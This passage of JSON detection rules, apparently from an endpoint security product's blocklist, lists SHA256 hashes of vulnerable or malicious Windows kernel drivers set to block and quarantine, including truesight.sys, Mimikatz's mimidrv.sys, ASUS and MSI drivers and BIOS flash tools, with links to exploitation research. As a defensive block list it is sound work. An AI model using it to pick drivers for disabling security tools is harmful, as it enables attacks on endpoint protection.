+ "hl_testing_start_time": "2026-03-23T11:45:31.153691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f76f5ac7ad8f077092b85ed16912b99e7a0eb91497aea292f61d1a97e07884ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e6772ef-b3c0-5d88-9f4f-24e60b50fc35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836065Z",
+ "creation_date": "2026-03-23T11:45:30.836067Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836072Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38bd451bc3a296a3e108f7ed83a014f345f7e8415015628bd3ec223d6270ca70",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e71c5da-cd2b-55d9-a07f-c977be843837",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810794Z",
+ "creation_date": "2026-03-23T11:45:31.810797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd4108979f44c34a3c6ed06cc410117450fec087ecf77937e4fb588e26b73ed9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e7e36d1-d152-5ce7-9da1-913e65016526",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144003Z",
+ "creation_date": "2026-03-23T11:45:31.144005Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e2ba9f06829ee04a6d4b1653754e415ad39a01570919256df716c94e071f84d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e816d24-4d20-53bb-855f-300bd55c448e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822255Z",
+ "creation_date": "2026-03-23T11:45:31.822257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822263Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10e36a55afb19c4a9611d8370225173c57e377fb0f237606072190679f85c99e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e853c92-a543-557f-ad3b-c62cc50312f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970297Z",
+ "creation_date": "2026-03-23T11:45:29.970299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970304Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e890d91-f163-5fad-9d09-a28bbc1373ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488027Z",
+ "creation_date": "2026-03-23T11:45:31.488029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9da15be14ff7e1e78ff6d67649268a3d9fd117a04393f9ff972326ddd887257c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ea38312-59e4-5549-b217-16878e7edfa7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142808Z",
+ "creation_date": "2026-03-23T11:45:32.142810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142816Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "023d722cbbdd04e3db77de7e6e3cfeabcef21ba5b2f04c3f3a33691801dd45eb",
+ "comment": "Vulnerable ITM SYSTEM File Filter Driver (aka probmon.sys) [https://antonioparata.blogspot.com/2024/02/exploiting-vulnerable-minifilter-driver.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5eadf19d-24f4-52d0-997e-6a2492e56563",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621281Z",
+ "creation_date": "2026-03-23T11:45:29.621283Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621288Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b48a309ee0960da3caaaaf1e794e8c409993aeb3a2b64809f36b97aac8a1e62a",
+ "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5eb06983-a32e-5265-af41-1208746544b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816986Z",
+ "creation_date": "2026-03-23T11:45:31.816988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4fde22ee85f60c67ad4c5ff15df2c7609ad24a44ad45144e06461f64c5149df5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5eb23368-f54a-5725-a0b8-8bd15528379b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492923Z",
+ "creation_date": "2026-03-23T11:45:31.492925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "825fd4c37680a98cc1855795a921536d4450776c731c2a71ecf28deb9d6e8188",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5eb7e638-80e1-547e-9bae-4a14f277255d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615082Z",
+ "creation_date": "2026-03-23T11:45:29.615084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615089Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3936d3356573ce2e472495cd3ce769f49a613e453b010433dafce5ea498ddc2",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5eb96b6c-a649-51bc-b76f-2f616e4fe36b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144055Z",
+ "creation_date": "2026-03-23T11:45:32.144057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28b39c57628cb12ca1bf2f531055c7d57008be5fd424aa691ecb648efe5768dd",
+ "comment": "Malicious Kernel Driver (aka driver_c3d48ddd.sys) [https://www.loldrivers.io/drivers/f6c08b8a-1d25-4bf1-9d4f-5368c1f6cfe7/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ebd7326-02b8-5c64-83e7-2aef25858e1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836594Z",
+ "creation_date": "2026-03-23T11:45:30.836597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cd13f392fc66286c0866f583edb8df3273057fe7848e2679aae5222dd09254b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ec7a5d0-8734-5b52-8c28-88af9bf496d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829394Z",
+ "creation_date": "2026-03-23T11:45:30.829396Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83cc4a85fce0635bed938e2ae866011c004192e0acdf1b1bb5ea03cfaa34fe3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ed1d32f-d554-5b7f-b87e-6942118e4c52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495151Z",
+ "creation_date": "2026-03-23T11:45:31.495153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "952b5e5ef69cf66a84baa52a13998ca5a038e51b6b31a6d281ee78eede0b9f30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ed7a61e-f252-50e1-b76f-b4eb1c1cc9a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142650Z",
+ "creation_date": "2026-03-23T11:45:32.142653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31ce60480166e9ebef758b66f770f3fea86dd429da27fc5eed755c3d8c4e20fa",
+ "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5eeb0bfe-767c-5408-a79e-aba661fd678b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466185Z",
+ "creation_date": "2026-03-23T11:45:30.466188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466197Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "818787057fc60ac8b957aa37d750aa4bace8e6a07d3d28b070022ee6dcd603ab",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f0a9012-e9bd-518e-870c-673e666967a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146764Z",
+ "creation_date": "2026-03-23T11:45:32.146766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c619a7fbb27940428b80129e0fa2d976fce52f93ab37667d2ca01330c6c561a5",
+ "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/bd6490c2-20ea-441e-803c-bc3b957dae4c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f0aabf7-a6b4-5b12-b668-97d9f57b8b89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616622Z",
+ "creation_date": "2026-03-23T11:45:29.616624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616633Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20f11a64bc4548f4edb47e3d3418da0f6d54a83158224b71662a6292bf45b5fb",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f162aad-7874-5e3d-b6d2-aa27ec1dcd86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616133Z",
+ "creation_date": "2026-03-23T11:45:29.616135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cde02c7db90626bcfbfbbc1315d4ce18d4f15667fa57c16b9ac2b060507c62ad",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f208f91-7acf-5630-b8be-932b0e8104a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817711Z",
+ "creation_date": "2026-03-23T11:45:31.817713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ef4a29303fadaebafa0370682a25ab16e9723ebb109c88d1c83764140c4256d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f31e738-5c01-57ff-ad46-1bddd804e8f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827160Z",
+ "creation_date": "2026-03-23T11:45:30.827162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827168Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8b3af5ccbcc7ca3fdde7818e0c706fc490f06aa20fff90c79f270445759e3d7",
